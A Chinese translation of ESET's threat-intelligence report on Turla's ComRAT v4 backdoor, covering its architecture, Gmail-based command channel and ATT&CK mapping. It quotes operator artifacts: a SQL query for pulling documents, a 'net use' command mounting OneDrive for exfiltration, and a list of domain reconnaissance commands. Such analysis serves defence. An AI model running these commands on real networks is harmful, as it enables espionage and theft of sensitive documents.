原文链接:From Agent.BTZ to ComRAT v4: A ten‑year journey
翻译:知道创宇404实验室翻译组

ESET研究人员近期发现了由Turla组织ComRAT经营的恶意软件的新版本。Turla,也被称为Snake,是一个臭名昭著的间谍组织,已经活跃了十多年,之前也介绍过许多该组织的活动

ComRAT,也称为Agent.BTZ,是一种用于远程访问特洛伊木马(RAT),该木马在2008年因违反美国军方使用规则声名狼藉。该恶意软件的第一版(约在2007年发布)通过传播可移动驱动器来展现蠕虫功能。从2007年到2012年,已经发布了RAT的两个主要版本。有趣的是,它们都使用了著名的Turla XOR密钥:

1dM3uu4j7Fw4sjnbcwlDqet4F7JyuUi4m5Imnxl1pzxI6as80cbLnmz54cs5Ldn4ri3do5L6gs923HL34x2f5cvd0fk6c1a0s

2017年,Turla开发人员对ComRAT进行了一些更改,但这些变体仍然是从相同的代码库中派生出来的,相关研究报告请见https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf。此外还发布了不同的ComRAT版本。这个新版本使用了全新的代码库,相比之前的版本会复杂很多。以下是该恶意软件的几个特征:

  • ComRAT v4于2017年首次亮相,直到2020年1月仍在使用。
  • 其至少确定了三个攻击目标:两个外交部和一个国民议会。
  • ComRAT用于窃取敏感文档,运营商使用OneDrive和4shared等云服务来窃取数据。
  • ComRAT是用C ++开发的复杂后门程序。
  • ComRAT使用FAT16格式化的虚拟FAT16文件系统。
  • 其使用现有的访问方法(例如PowerStalli on PowerShell后门)部署ComRAT。
  • ComRAT具有两个命令和控制通道:
    1.HTTP:它使用与ComRAT v3完全相同的协议;
    2.电子邮件:它使用Gmail网络界面接收命令并窃取数据。
  • ComRAT可以在受到感染的计算机上执行如泄露其他程序或文件的操作。

关于Turla

根据相关的受害者和TTPs,我们相信Turla仅使用ComRAT,以下是相关的几大表现:

  • 它使用与先前版本相同的内部名称Chinch
  • 它通过HTTP使用与ComRAT v3相同的自定义C&C协议
  • 网络基础结构的一部分与另一个Turla恶意软件Mosquito共享
  • 以下部分已被Turla 恶意软件删除
    1.定制的PowerShell加载器
    2.PowerStallion后门
    3.RPC后门

攻击者的相关活动

在我们的调查过程中,可以了解Turla操作员在受感染机器上所执行的命令,ComRAT主要用于窃取机密文件。在某种情况下,其运营商部署了.NET可执行文件来与受害人所包含组织文档的中央MS SQL Server数据库进行交互。下面是已编辑的SQL命令:

sqlCommand.CommandText = "select top " + num2.ToString() + " filename, img, datalength(img), id from <Redacted> with(nolock) where not img is null and id>" + num4.ToString();sqlCommand.CommandText += " and datalength(img)<1500000 and (filename like '%.doc' or filename like '%.docx' or filename like '[0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9]%.pdf' or (filename like '3%.pdf' and len(filename)>9))";sqlCommand.CommandText += " order by id"; |

然后将这些文档压缩并传输到云存储提供商(如:OneDrive或4shared)。使用net use命令安装云存储,如下所示:

 tracert -h 10 yahoo.comnet use https://docs.live.net/E65<redacted> <redacted password> /u:<redacted>@aol.co.uktracert -h 10 yahoo.com |

除了窃取文档外,操作员还运行许多命令来收集有关Active Directory组或用户对网络的信息进行配置。以下是由Turla操作员执行的命令列表。

gpresult /z

gpresult /v

gpresult

net view

net view /domain

netstat

netstat -nab

netstat -nao

nslookup 127.0.0.1

ipconfig /all

arp -a

net share

net use

systeminfo

net user

net user administrator

net user /domain

net group

net group /domain

net localgroup

net localgroup

net localgroup Administrators

net group "Domain Computers" /domain

net group "Domain Admins" /domain

net group "Domain Controllers" /domain

dir "%programfiles%"

net group "Exchange Servers" /domain

net accounts

net accounts /domain

net view 127.0.0.1 /all

net session

route print

ipconfig /displaydns

最后,我们还注意到Turla运营商进行了逃避安全软件检测的相关操作。如:定期抽取与安全性相关的日志文件,来了解是否已检测到其恶意软件样本。这表明相关人员的复杂及其潜在的意图。

技术分析

根据其编译时间戳可以看到ComRAT v4的第一个示例已于2017年4月进行了编译,与之相关的后门在2019年11月进行了编译。

基于ESET遥测,我们认为ComRAT是通过现有立足点(例如,受感染的凭据)或另一个Turla后门进行安装的。如:根据2019年描述的基于PowerShell的后门程序可以看到PowerStallion安装了ComRAT 。

ComRAT安装程序是一个PowerShell脚本,可创建Windows计划的任务并用加密的有效负载填充注册表值。

ComRAT v4具有以下几个组件:

  • 编排到explorer.exe中的协调器。它控制大多数ComRAT功能,包括后门命令的执行。
  • 通信模块(DLL)由协调器注入到默认浏览器中。它使用类似的命名来协调器通信。
  • 一个虚拟FAT16文件系统,其中包含配置和日志文件。

下图是ComRAT架构的概述。

ComRAT v4具有两个不同的C&C通道:HTTP和使用Gmail Web界面的电子邮件。

在后一种模式下,使用配置中存储的cookie,它会连接到Gmail网络界面,以检查收件箱并下载包含加密命令的特定邮件附件。这些命令由恶意软件操作员从另一个地址发送,该地址通常托管在其他免费电子邮件提供商(例如GMX)上。

所有组件的详细技术分析可见白皮书

结论

ComRAT v4是于2017年发布的经过全面改造的恶意软件系列。其开发人员从Snake等其他Turla后门获得灵感,以构建非常复杂的恶意软件,有趣的是使用Gmail网络用户界面来接收命令和提取数据。因此,它可以绕过某些安全控制,不需要依赖于任何恶意的域。我们还注意到,此版本放弃了之前持久性使用COM对象,转而使该恶意软件具有了通用名称。

目前仍有迹象显示ComRAT v4仍在使用,这表明Turla小组仍然非常活跃,其已经对外交官和军队构成了重大威胁。更多信息可在完整的白皮书GitHub存储库中查看。

MITRE ATT&CK 技术

Tactic Id Name Description
Execution T1086 PowerShell A PowerShell script is used to install ComRAT.
Persistence T1053 Scheduled Task ComRAT uses a scheduled task to launch its PowerShell loader.
Defense Evasion T1027 Obfuscated Files or Information The ComRAT orchestrator is stored encrypted and only decrypted at execution.
T1055 Process Injection The ComRAT orchestrator is injected into explorer.exe . The communication DLL is injected into the default browser.
T1112 Modify Registry The ComRAT orchestrator is stored encrypted in the Registry.
Discovery T1016 System Network Configuration Discovery Operators execute ipconfig and nbstat .
T1033 System Owner/User Discovery Operators execute net user .
T1069 Permission Groups Discovery Operators execute net group /domain .
T1082 System Information Discovery Operators execute systeminfo .
T1083 File and Directory Discovery Operators list the content of several directories. Example: dir /og-d "%userprofile%\AppData\Roaming\Microsoft\Windows\Recent*.*" .
T1087 Account Discovery Operators execute net user and net group .
T1120 Peripheral Device Discovery Operators execute fsutil fsinfo drives to list the connected drives.
T1135 Network Share Discovery Operators execute net view .
Collection T1213 Data from Information Repositories The Operators use a custom tool to exfiltrate documents from an internal central database.
Command and Control T1024 Custom Cryptographic Protocol ComRAT uses RSA and AES to encrypt C&C data.
T1043 Commonly Used Port ComRAT uses ports 80 and 443.
T1071 Standard Application Layer Protocol ComRAT uses HTTP and HTTPS.
T1102 Web Service ComRAT can be controlled via the Gmail web UI.
Exfiltration T1002 Data Compressed The documents are compressed in a RAR archive.
T1022 Data Encrypted The RAR archive is encrypted with a password.
T1048 Exfiltration Over Alternative Protocol Data is exfiltrated to cloud storage, mounted locally using the net usecommand.

Paper 本文由 Seebug Paper 发布,如需转载请注明来源。本文地址:https://paper.seebug.org/1222/